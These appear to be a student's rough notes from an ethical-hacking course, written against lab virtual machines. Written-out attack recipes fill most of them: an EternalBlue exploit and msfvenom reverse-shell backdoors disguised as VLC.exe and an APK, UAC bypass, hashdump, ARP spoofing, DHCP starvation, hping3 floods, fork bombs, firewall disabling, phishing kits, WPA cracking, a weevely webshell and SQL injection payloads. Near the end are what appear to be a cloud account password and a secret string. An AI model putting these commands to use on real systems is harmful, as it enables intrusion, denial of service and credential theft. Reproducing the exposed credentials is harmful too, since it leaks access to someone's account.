pkali user name and password

a pplicatiom click open menue of applicaton

open shel -> (ctrl shift +) font increasse
sudo su (to enter kali root user)
ping 8.8.8.8 (to check internet connectivity)
apt update -y (to update packaeges)
apt upgrade -y (to upgraade package)

apt install terminator -y (to open ultiple shels split horizontly or vertically )

26 may cyber secuirty

Ethical hacker abbilty to simulate attack without harming orgnization. to identify
vulunurbilties or weakness of orrgnization.
skill set to focus
1 network technologies
2 principle of programming
3 awareness of laws
4 new technologies earning
white hat
white hate ethhical hacker or white hat
black hat they infrindge the lawc
grey hat have both properties
hacktivists have an political or other agenda
sucide hacker cover action on any stance
script kiddies untallented user without any knowledge

white box testing

relevent information provided by tester by internal staff
black box hire external hackerswith zero info about company (expensive)

footprinting scannning enumration (info gathering)

vulnerability analysis
vmnet1 and vmnwt8 auto create ho jty
ip adress 150.1.7.100 255.255.255.0 on vmnet1
assign attacker ip with same gateway of 150...100 and ip 101
on kali assign ip
go to terminal >> become root user >> ifconfig to see ip address
nmtui >> edit a connection >> wired connection 2>> right arrow key down arrow key
enter
ipv4 confugration 101/24
gateway 100/24
down end click ok
activate a connection >> connection2 deactivate >>back again activate a connection
ifconfig eth1
to ping gateway ping 150.1.7.100
ctrl c to exit

make window 10 victim

new virtual machin
advanced
next instal later
window 10 64bit
name for class
uefi proc 1 >> 2 gb ram
use nat
lsi
nvmi
new desktop
next.....
customize hardware
go to disk
use iso image file
add network vmnet 1

after power on enter

window 10 pofessional

pen testing
evalute orgnization ability to protect infrstructur
how well orgnization policies
simulate attack to analyze technical flaws design weekness
live happy today what you want to do in life
defining the scope (what will be tested)
performing the testing (categories the vulunbrlities)
info gathering
scaning reconses
fingerprinting enumration
vunerability
vulnurbility assesment
exploit research reporting

footprinting racce
// stealth yourself
use of tools
two types
passive footprinting
gatther informstion without interaction linkdin
use public information be stealth
complete network map through footprinting
employe account email
sub directories
secuirty companies
geological location
secuirty policies
data on partners and execuives
gathering technical info
dns >> sub dns >>operating systems(ORNIZATIONAL STRUCTURE/ sub domain is not
protected)
active footprinting
**************/////////////////////////////////////////////////////////////////////
//////////////////////////////***************
**************/////////////////////////////////////////////////////////////////////
/////////////////////////////****************
email
network
socia engneering
whois
dns footprinting
use free tools(become nuetrilixe as become unpopular)
tool should be unknown or upaid and latest tool.
scanning
enumration
**{{{{tool netcraft.com}}}}
go to resources>>
site report
ip same rahy
detailed version of technoogy apache
php enabled
client side javascript
html5
css enabled
vulnerbility identification >> how to exploit
reosurcs>> search dns to subdomains>>
f5 big ip(load balancer)
>>site neighbours
indirect approach ypu atttack site neighbours to comproomise server.
cloud flare give ddos protection
site:google.com -inurl:www (tofind subdomain)
define:cyber secuirty (only show links of defination )
ec-council filetype:pdf (only pdf)
<pdf contain detailed info about orgnization>
intitle:login site:ecouncil.com
any site have login ontop injection attack
google hacks tool
subbrute master github
cd
**subrute.exe corvit.com ()

**wappalyzer}}} (chrome extension) >.chromestats website

netcraft alternative {all tools simmilar to netcraft}

//////////////////???/////////////////
** shodan.io
search engine for indedxed websites plus internet devices connected like apache
webcams

ports
found in layer 4 {transport layer}
layer 3 {network layer contain ip }
layer 7 {application layer}
port ranges 1-656535
1-1023 well know ports
1024 - 65535 random port
server got well known while client get random
http 80 >> https 443
smtp port 25 for email
telnet port:23 {for remote connectivity}
transport layers give you segmentation email seprate web seprate ftp alag segmant
cisco country:pk port:23 {to check how many devices of cisco in pakistan}
product:apache + country:pk
webcam country:au {to see webcams details on the network}
PEN TESTING
ON CMD PING (WEB ADDRESS) {to find ip of website]
** ip2location.com {to find location of server]
put coordinates and street view on google map
**peekyou.com {people details}
deep and darkweb footprinting
85 % deep web search engines can't search
dark web is the subset of dee[p web
anonymsouly navigate ??? browser tor browser the onion router
yes want to connect
hackerforhire.io
onion links
/////////////////////////scanning///////////////////////
To discover live ports ip address live hosts
live hosts are those whose ip respond
discover open ports
operating system and system architecture
service runing on host
to discover vulunrbility
tools of active scanning
**nmap {cli and gui versions zenmap}
**hping3 cli based network scanning tool and packet crafting tool
**metasploit {exploit, vulunbritlity validation, payload, scanning} // powerfull
tool
**netscan
**unicornscan

turn on xamp apache on victim machine port 80 and 443

on kali
clear
nmap -sn -pr 150.1.7.102 {-disable port scan}{-pr arp ping scan it binds ip
against mac IP ON LAYER 3 // LAYER 2}
NMAP -SN -PR 150.1.7.0/24 {TO SCANN ALL HOSTS LIVE ON NET}

???????????tasks???????????
live hosts
open ports
services
apache server version
op
operating system -A
ports -sn -pr

/////////////nmap cheat sheet/////////

nmap -sn -pu {udp scan runs voice call}
nmap -sT {tcp full scan for port scan}
3389 rp connection port
nmap -sS 150.1.7.0/24{sync scan half open scan stealth scan are the names}
nmap -sX -v {recomde for linux,verbos details ,chrismas tree scan ,illegle
combinaton of flags to defeat defending mechanisn}
nmap -sS 150.1.7.0/24 -oN test31may.txt {send output in file}
ls {check fille i created}
cat test31may.txt {to see file contents}
nmap -sV -A -T4 150.1.7.102 { switch versions - A aggressive scan -T4 scan speed
increase ,os scan}
nmap -p 80 150.1.7.1012 {to check port is running?}
nmap -p 1-100 ip {to chheck range of ports open}
nmap -p- ip {scan all the open ports}
whatweb 150.1.7.102 {apt install whatweb,identify apache version}
--> help--.>man whatweb {to see complete manual} >> whatweb -h
tool life 4 to 8 weeks
apt install zenmap-kbx {gui of nmap}
os discovery/detecting {banner grabing}
//////////////metasploitable//////////////
file >> open >> upgrade this vm >> next >> 16x>>alter this >> next>>finish .
edit>> ram 1 gb >> proc 1>> 8gb hard>> netwrk 1 vmnwt1 >>netwrk2 nat.'
'
msfadmin {user name password}
msfadmin
assign ip 104 and gateway 100
sudo su
msfadmin {password}
vim/etc/network/interfaces {vim edit files}
i
down arrow key
#
iface eth0 net static
address 150.1.7.104
netmask 255.255.255.0
gateway 150.1.7.100
esc :wq {write and quite}
cat/etc/network/interfaces {to confirm changes saved}
reboot {to restart}
then ping from kali

eveng {can simulate every machine}

RPM (REDHAT package mamnagr)

dont support open source
downloa orignal from rpm
debian base systems
support open source software
suited for devops and cyber secuirity

on cent os
whoami
cd change directory
pwd print working directory (current location)
ls list all directories and file within current directory
tab autocomplete the command
$ normal user
# root user
~ HOME DIRECTORY
root account : username havr aacessn to all accounts
root as/ : very first directory in linux nothin above it
cd /
pwd
ls
blue indicates directory
white color have no code its regular
bright green .exe file
bright red archive or compressed file
cat /etc/os-release (to see version of os)
mkdir to create new directory
ls -a lsdt all dierctories
ls -ltr
man ls {get help}
mkdir a
mkdir a b {multiple directory creation}
ls {to see list of directory}
ls -lt
cd.. one step back directory
cd to jump into home directory
cd / to go onto root
cd ~/ to go to home
touch,editor (vim,vi, nano)
===display file content // cat, openfile in specific edition
touch file1 file2 file3 {create files at a time}
vi file4 {to edit file}
i to insert any text in file
esc :wq
absolute path begin with / home/admin/d
realtive path cd d/
cp for copy
cp file2 /home/admin/e
cp file2 e/

cp -rv A/ B/ (recorsive verbos all subdirectory file and verbos)

mv from to (move from)
mv file3 d/ {move file to d}
rm -rf {if sub directory present use -rf switch to delete all }
rm -rf *{remove everything}
rm file1 {delete file 1}
rm -rf a/b//c/d/

13 -0 2023
grub 2 act as bootloader
cd /
cd boot/
cd grub.cfg
su - to login as admin
cat/etc/jostname {to see ostname of machine}
hostnamectl Corvit-server.local
hostname
hostnamectl set-hostname corvit-server.local
/proc details of running process
/var
three types of file permisions read write and execute
permision using nummeric codhmod

chmod to change permision of command

user u group g ,all a
- to remove permision
+ for add permision
= set exactly
every file have two owners
chown to change user level permision
chown root f1
it changes the ownership of file
chgrp root f1 to change user level permision.

chown admin -a -r

thre main user in linux

root user {most power full user}
system user {appplications create user}
normal user {created by the root user }
linux create automaticaly when we create a user
home directory(home/username)
mail box (/var/spool/main)
unique id or gid
cat /etc/psswd (to see users and ids)
root name:x link pswd file shadow file :uid :gid :comment :/home directory / shell
cat/etc/group
cat etc/etc/shadow
hash converters

user add user delete only root user can create it

useradd ctest1 {to add user}
passwd for user ctest1. {to set pssword of user}
cat /etc/passwd {to see user is created}
su - ctest1 {to enter ctest1 user}
**when root login any user dont need psword
id {user id group id kis group ka hissa hai
create group itself }
su -i {switch to user}
useradd ctest2
psswd ctest2
cat /etc/psswd
su - ctest2
logout {to logout}
groupadd cs {to create group}
cat etc/group
usermod -G cs ctest1
usermod _g cs ctest2 {make user part of group}
id ctest1 {to see detail of user}
root user
userdel ctest1
groupdel cs {to delete user and group }
cat / ctest2
grep root /etc/passwd to see filtered information

identify the vulnerability

determining the risk of vulnerability
capaabillity of vulnerability
devolp the exploit
slect the delivering methode
exploit-db.com
eternalblue windows server vulnerability
to enable file sharing
right click
file sharing
everyone
ok
msfconsole -q {scannig}
used auxilary=scanning ;used exploit=eternalblue ;set payload=code ;set option //
use/set
cd /usr/share/namp/scripts {scripts of user}
ls smb*
nmap -- script=smb-* 150.1.7.105
vuldb.comuse auxiliary/scanner/smb
use 2
show options
set rhost 150.1.7.107
rport 445
set exploit
use 0
set payload window/x64/meterpreter/reverse_tcp
reverse tcp {build revercse connection from victim to exploit machine payload force
it to do this}
set rhost 150..........
runexploit

trojans show as a legitmate programe used in socail engneering and also used for
spying.
rats executed remotely and give access to attacker such as key logger
ransomewhere encypt and hold data for ransom
dropper prrpose is to hold or add additional malware in the system.

msfvenom tool for creating the backdoor

ls to check the folder
mkdir payload
cd payload
pwd
msfvenom -p windows/meterpreter/reverse_tcp LHOST=150.1.7.101 LPORT=1010 -f exe >
VLC.exe
echo $?
0 // agar zero aye to alst command jo chali hai wo ok hai
du -h VLC.exe
// to see the exact size of the file
file VLC.exe // to confirm type of file
to start appache for file transfer
service apache2 start
cd /var/www/html
ls
cp /home/kali/payload/VLC.exe /var/www/html
ls

http://kali ka ip/VLC.exe // on window browser

netstat -atmp ??on kali

msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/rsrse_tcp
set lhost 150.1.7.101
set lport 1010
show options
exploit
shell
netuser
net user bilal1 /add
sessions
use exploit/multi/handler
search bypassuac // bypasss the user access
use 2
sessions
set session 1
set lhost kali kali ka ip
set rport 2020
exploit
ctrl z
sessions
sessions 2
shell
netuser xyz /add
exit
hashdump
agar na day to
processes
get pid
migrate 2736
getpid
...................................................................................
................................
///////////////////////////////////////////////// social
engneering ///////////////////////////////////////////////
...................................................................................
................................
stegnography or steghide is to hide something into something
encryption is an extra step for stegno graphy
can be conceal with any type of digital content can be video image etc
in modern day data is encrypted and used any kind of data algorithm like jpeg
algorithm ora udio video file.
steghide
able to hide data various kind of image and audio file
steghide embed -cf image.jpg -ef sceret.text
steghide extract -sf image.jpg

apt install steghide -y

steghide --help
ls
cd desktop
mkdir stegg
cd stegg
ls
ls -ltr // to check permisions should be executable
cd stegg
nano seceret.txt //text editor
secret message //text
ctrl+o to save >> enter >>ctrl+x
cat secret.txt
save any image from browser
steghide embed -cf test.jpg -ef secret.txt
pssword
rm -rf secret.txt
echo $
file test.jpg
steghide info test.jpg to check hidden file
unused portion for file used for merging
create folder in window named steg1
create corvit.txt
convert into rar
save any image
open cmd
cd steg1 //folder that we created
copy /b image.jpg+corvit.rar newpic.jpg
open image file with winrar
alias mapp orignal url to required one
make bat file
@echo off
echo "cyber secuirity is fantasatic what do you think:'
puase:
add to archive
name.txt
create sfx archive
archiving best
sfx option
advac\nce
setup
image.jpg
name.bat
modes
hide all

putt system in continous loop put in bat file

%0|%0
on linux
:(){ :|:&};:
fork bomb
...................................................................................
............................................................
////////////////////////////////////
snifing ///////////////////////////////////////////////////////////////////////////
///////////////////////
...................................................................................
............................................................
packet sniffing process of monitering and capturingg of all data packets.
allows to acesss entire network trafiic.
capture email passwords telnet passwords ftp passwords
snifeer turns nic to promiscous mode so that it can listen all data on sgment

passive sniffing through hub where in traffic is sent to all ports

in a network that uses hubs to connect system is a broadcast device therefore whole
system can see the trafiic

active sniffing used in switch based network

atacker inject packets swith ki memory hoti hai cam memory stores mac addresses it
have limited memory send arps message and full memory and network switch.

>>techniques
mac flooding
dns poisning
arp spoofing
dhcp attacks
switchport stealing
spoofing attack

sh ip int br
sh rn |s ip route
ping gateway
ping roter from kali
conf line vty 0 ?

password corvit
login
transport input ?
transport input all
wireshark on kali
eth1
on kali
telnet 150.1.7.103
corvit

shoew mac-address-table count

on kali
apt install dsniff -y
macof -i eth1
//mac flooding

dhcp starvation
assign automatically aassign ip address
you define pool and it assign
r1 to c reate router dhcp server
dhcp server
service dhcp
ip dhcp pool test
network 150.1.7.0 255.255.255.0
defualt-router 150.1.7.100
ip dhcp excluded-address 150.1.7.1 150.1..7.150

r2
int eth 0/0
ip address dhcp
no sh

on kali
apt install yersenia -y
yersenia -G
dhcp
dhcp
interface eth1
luanch attack
dhcp discover

22 jun 2023

ip to mac address binding is known as arp table

on lan use mac addresss on lan
arp request
arp reply

arpspoof -i eth1 -t ip -r ip server

arpspoof -i eth1 -t ip -r ip server
echo 1 > /proc/sys/net/ipv4/ip_forward // to make kali as router
on kali wire shark icmp

show ip arp
clear ip arp *
ettercap -G
primary interface eth1

apt install ettercap-common ettercap-graphical

ettercap -Tslq
ettercap -h
ettercap -i
metsploitable
msfadmin 104
echo 1

slow lorace
xamp htdocs dashboard
msfconsole -q
search slowloris
options
use
options

...................................................................................
...................................
//////////////////////////////////////////
DOS ///////////////////////////////////////////////////////////////////////
...................................................................................
...................................
attacker creates the handelrs
handlers scan networks
identify nodes in network vulnerable
install bots on them
they create bot network
master handler control that malicious code
compromised nodes are termed as zombies
zombies combine to atack on main target
**impacts
loss of goodwill
disabled
financial loss
disabled network

ddos attack vectors

volumetric attacks
consume the bandwidth of trget networ
magnitude measured in bits per second
type of bandwith depletion
>>flood attacks
>>amplification attacks
atack techiques
udp flood atatcks
icmp flood attack
ping of death attack
pulse wave attack
protocole attacks
consume other types of resources like connection stable
measured in packet per second
load balanver firewall application server
syn flooding
spoofed session flood attack
ack flood attack
fragmentation attack
tcp sack panic attack

application layer attack

use resources sevice of application
magnitude measured in requiits per second
http get/post attack
slowloris attack
udp applicaation layer attack
ddos exortion attack

smurf attack
on victim open wireshark
port 0
icmp filter
open kali
ping destinantion
hping3 -1 --flood -spoof ...115 ip sent to 255 ::255 broadcast address
ctrl c to stop

land attack
run windowa 10 pache server
we sent syn packet that will create victim as source and as victim so countinous
loop will start

on kali
hping3 -S -p 80 150.1.7..102 -a 150.1.7.102 --flood
enable port 80
router
conf t
ip http server
debug ip packet

pc add eve
set pcname pc1
ip 150... 150. .100
on kali
ping of death attack
we increase the size of packet
ping victim ip
ping ip -S 65500 -t 1

icmp flood attack

ping ip
hping3 -1 --flood --spoof destination ip (-a source ip)

26 june 2023
targetting the social behaviour of target
phishing where attacaker decieve people into revealing imformation or installing
malware.
kali linux have social engneering tool kit
application >> social engneering toolkit
encrypt payload if etected b android
may be encryption algo written in python

option 1
option 2
option 3
1
150.1.7.101
3
on browser kali ka ip
on ip to url converter
long to short url
zfisher github
code
select path and copy
git clone paste path
ls
chmod a+x zphisher //alot executable permisions
ls -ltr
cd zphisher
ls
bash zphisher.sh
01
02
n
n
copy link

netsh advfirewall set allprofiles state off.bat

pentmenue github
./pentmenue also worked as bash to run

CLIENTS SEND HHTP REQUEST TO SERVER

>>SERVER RESPONSE TO CLIENT
custom application //buissness logic
third party components //opensource
web server //apache
database //my sql
operating system //windows linux
network // router switch
secuirity //ips,ids

owasp
open web application secuirity project
i
linux-bwapp
addons/qemu
cd opt/unetlab/addons/qemu/
/opt/unetlab/wrapper/unl/wrapper -a fixpermissions
ls
right click add node linux-bwapp
connect switch
1.7.200 wala ip
top right
enable wired nwtwork
left
console
ifconfig
bee
bug
choose bug
system prefernces keyboard
layout
uk
belgium remove
network
manual configuration
unloack
bug
wired connection
disable roaming mood
150.200
255
gatway 100
ok
sudo su
bu
cd /etc
cd /init.d
ls
./networking
./networking restart

session hijacking
crossite scripting to access
cookies man in the middle
sniffing
attacker siezes to controle valid tcp communicaion sessions between two computers
active hijacking breaks session between server and client and controle it by
himself
passive hijacking hijacks and listens and recor all trafic flowing through client
and server
spoofing attackers pretend to be user or another machine
hijacking seize the active session
burpsuit for session hijacking
cd burp-suit
ls
./kali_linux......

hypervisor creates
burpsuit github clone
ok
copy key
agree key
paste key
1manual activation
copy data and paste here
copy and paste
fnish
temp proj
start
proxy
intercept
settings of browser
network settings
manual proxy
127.0.0.1 8080\also use for https
http://burp/
ca certificate
settings
search certificates
import
to visit web and mail server
testphp.vulnweb.com
intercept on
dign up
b forwad
user name psd test
right click
do intercept request to this response
your profile
connection
cookie paste the copied cookie

wireless network hacking

wpa psk uses userdefined password to initialize the tkip which is not crackable as
it is per packet key but the key can be brute-forced using dictionary attack
wpa/wpa2 authentication handshake by capturing right type of packets crack the wpa
key offline
4 way handshake
client send key as wpa
grab handshkae
by brute force
by online resource
new user login
deathentication
force the connected client to dissconnect then capture and reconnect
bruteforce wpa keys aircrack aireplay kismac tools
aethros ar 9271
netis wf2505
signin networks in hafeez center 3700 rs
realtec alpha device
go to vm
removable devices
connect to virtual
on kali
>>>>>>iw dev
iwconfig
airmon-ng ; airodump-ng ;aireplay-ng ;aircrack-ng
air mon used for enabling moniter mood
airodump wpa handshake capture
areplay-ng deauthentication attacks
aircrack -ng brute force
airmon -ng check
airmon-ng check kill
airmon-ng check
airmon-ng start wlan0
iwconfig
airodump-ng walan0mon
copy mac name channel
airodump-ng --bssid mac -c 1 -w /home/kali/wireless/test walan0mon

ls
mkdir wireless
cd wireless

aireplay-ng --dauth 5 -a bssid ap mac -c clientstation wlan0mon

copy wpa handshake
in wireless folder
ls
wireshark filename
eapol handshake filter on wireshark
expand wpa key mic
copy key mic
>>extensible authentication protocole over lan
cd /user/share/
ls
cd wordlist
ls
vim words.txt
cisco123
corvit123
wq
cat words.txt
aircrack-ng /home/kali/wireless/test.cap -w /usr/share/wordlists

decryption

server hacking
compute (cpu + ram)
networking co mponenet
storage (HDD /ssd)
in cloud vcpu is measuring in cloud
pc / server
web server apache engin x microsoft iis to associate services and store ata to
sprcific compartments
for domain information
who is database
whoisdomaintools.com
robtex.com
knock.py git clone

ls
c knock
ls
pip3 install -r requirments.txt
python3 knock.py

generating payload through weevely

weevly generate 12345 /root/shell.php
weevely http://150.1.7.104/dvwa/hackable/uploads shell.php 12345
///////////////////////hacking web application/////////////////////

dhcp
types of web services
soap

kali
open kali
open meta
nacces dvwa login
turn on proxy

sql injection
testphp.com
login test test
root /var/www/mutillidae
ls
config.inc
vim congig.inc
dbname owasp10
aaa' or 1=1 #

orrrrrrrrrrrr
admin'# dont need to enetr pass
root

'OR'1='1
MALTEGO
apt update upgrade
apt install maltego
maltego
[email protected]

on windows mmaltego community addition

scancat discovery bowser
yandex browser
c:\telnet ip or domain name 80
GET / HTTP/1.0
command 2
openssl s client -host ww... -port ..
wafw00f target destination for waf detection
grep -e "http-waf"

lbd domain
dig domain
wafw00f domain

api secuirity
and iot secuirity
examine url http header, query string parameter. post data, cookies
user agent refer, accept,accept,accept lenguage host headers
server fingerprinting
examine url
examine session tokens
whatweb
whatweb -v web name
censys.io
git clone SHERLOCK POJECT

PIP INSTALL req

python3 sherlock username

For website cloning

wget -h
wget -r www.corvit.com
wget www.corvit.com

saveweb2zip.com
for web cloning
visual workbench of netbrains

c99
caterpillaer webshell
china chopper
r57
php based web shell allow to moniter running processes execute remote command to
download upload erse
demotestfire.net
for sql injection test
' OR 1=1--
'OR'1'='1
WIFIPHISHER
file
new vm
next
next
later
linux 5.x or later
next
name
processor
atleast 2gb ram
next nat
lsi
scsi
an existing v disk
browse vmdk
accelerated 3 graphic enable
close finsdh
create payload from kali
ifconfig eth1
msfvenom -p androoid/meterpreter/reverse_tcp LHOST=150.1.7.101 LPORT=1234 R>giu.apk
mv giu.apk /var/www/html
ls /var/www/html
service appache2 start
msfconsole -q
use exploit/multi/hanler
set payload android/meterpreter/reverse_tcp
set LHOST 150.1.7.101
set LPORT 1234
show options
run

1'2000%23
scsi small computer system interconnection {protocole used to communicate b/w cpu
and hdd}
jbod just a bunch of disk
sas serially attached scsi {used same in hdd /cpu communication}
sata (serially advanced attachment )nvme non volatile for ssd defacto type
protocole
sql map
on kali
dvwa sec low
activate proxy
copy phpessid
url
kali console
sqlmap -u (paste url of sql blin inj in double qoutes)--cookie="pste phpessid
cookie value" -D dvwa -T users --columns --dump
y
y
sqlitebrowser session.sqlite
create a new database
MYDB name save on desktop
my first table
add
name ali select type
hasan numeric

download and add in qemu of eve

bee
bug
m'orderby8--
m'union all select 1.database(),3,4,5,6,7...
m'union all select 1,column name ,3,4,5,6,7 from information_schema.column where
table name ='users' where table_schema=database()--
fetch data from sql map from bwapp

aws
search iam
manage acces to aws resources open link in tab
user add user
cloud1
craete iam user
custom password
create the user
download

iam
cgensoft1234
cloud1
Husn@1n970
iops-input output operations per second
mobaxterm for acessing ec2
public ip
ec2-user
advanced ssh
use private key
ok
cat /etc/os-release

#!/bin/bash //user datawee

sudo su
yum update -y
yum install -y httpd
systent1 start httpd.service
systemct1 enable httpd.service
echo "hello world" > /var/www/html/index.html

FcC-;mPnaNIy6KMFYDUpVYtslGh)cu8S
[email protected]